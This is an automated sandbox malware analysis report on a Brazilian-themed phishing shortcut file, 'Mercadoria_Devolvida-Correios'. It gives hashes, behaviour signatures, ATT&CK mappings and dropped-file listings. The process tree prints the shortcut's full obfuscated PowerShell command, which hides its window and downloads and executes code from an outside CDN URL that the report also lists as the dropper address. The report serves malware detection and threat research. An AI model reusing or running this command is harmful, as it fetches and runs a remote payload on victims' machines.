858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13-09-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2716	powershell.exe
4	2716	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2716	powershell.exe
2716	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2716	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2716	2736	cmd.exe	29
PID 2736 wrote to memory of 2716	2736	cmd.exe	29
PID 2736 wrote to memory of 2716	2736	cmd.exe	29
PID 2716 wrote to memory of 2428	2716	powershell.exe	30
PID 2716 wrote to memory of 2428	2716	powershell.exe	30
PID 2716 wrote to memory of 2428	2716	powershell.exe	30
PID 2428 wrote to memory of 2492	2428	csc.exe	31
PID 2428 wrote to memory of 2492	2428	csc.exe	31
PID 2428 wrote to memory of 2492	2428	csc.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2736
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2716
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vbshil-.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2428
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C73.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5C72.tmp"
      4⤵
      PID:2492

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3vbshil-.dll

Filesize
3KB

MD5
4fb3e9620b3467dd66c45b0f2e346986

SHA1
60875c5765c05af523cf2f3db9c6509027eed365

SHA256
8b7db0c0a4c1f247e743be5523b90e9894f5685065072a04b21aabcf16e3c07e

SHA512
5347dd500eeb3ebf6899c20b954350a380cfd22ed71f2b11ce49a77a18019ad0534f557527a977d6c3e9d4dadc75524b96175c20250ea8b9df6190e636d5386f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3vbshil-.pdb

Filesize
7KB

MD5
989d9a47559e84b02555bc1476d84b98

SHA1
ef6b5bc1a0bbbc4bf4d1f652c84aae243eae9174

SHA256
3f7e5f62d0168bd106e853a631c90343878f8c5a4238215c1d98c21ad8b04c53

SHA512
9e3818f37bf32ebc725cf9ba9cf1e7e23b58acd4949fdf42b7a507bb6b89a9ac5db1de691cce399b0edd788d8d5a4f17caa26a4e79e7e0eb93aeb5e46c45003b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES5C73.tmp

Filesize
1KB

MD5
bc30c38f4cc709586af24c40bd7ad5de

SHA1
968576b4c0dfc9fca1d2da8afcb465b98bb09bdc

SHA256
852a7ea1c8d175785f1baf49a12e30a81ae3351833028ce34e6aee3a247c1eab

SHA512
c3d28500a4b5cfbd02e4836e2b023c604ff7d2e92fc2542946249e7ba9c1c536fb0fc5716c2562243b289d1d94533527d263ae2ab67e08250e335189437c1c6c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3vbshil-.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3vbshil-.cmdline

Filesize
309B

MD5
e44242407187843577eb8c466947afee

SHA1
37e405f30c1e4e7e4d67d9d6423626c4cbc7cb87

SHA256
5def5be9c29bb4e8eca0cc826286f5bfb154eb185d134dd9d8aa00fb197e6096

SHA512
29f24ef731bd3e7eb1b0d224090a1c369fb888477c793a1fe50ffd7ccd5f7b534ea3d056967e6afb3da15e2624f8b6d40ad58e8f828719fdbe538f645fdc2124

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC5C72.tmp

Filesize
652B

MD5
d56c5f7d1948e105f6c6d8d5ac0dab2c

SHA1
c4a4a47ffd7d068de7df7563439f08caae2825b8

SHA256
ad0a1752542aebd36fa6c094104618b110875bb2ed0991ef8f483f4209bcd39a

SHA512
3450f29006b7e596473d6f36a9a36d82131d18e6716772c6f3bd3e1e33abfdc2359e35dcc071268c87bb9761b1ab12018a29a847ebd7f2fec3a96a0f6006b6da

Download Submit
memory/2716-44-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-45-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-40-0x0000000002290000-0x0000000002298000-memory.dmp

Filesize
32KB

Download
memory/2716-43-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-38-0x000007FEF599E000-0x000007FEF599F000-memory.dmp

Filesize
4KB

Download
memory/2716-41-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-59-0x0000000002B00000-0x0000000002B08000-memory.dmp

Filesize
32KB

Download
memory/2716-42-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download
memory/2716-39-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2716-62-0x000007FEF56E0000-0x000007FEF607D000-memory.dmp

Filesize
9.6MB

Download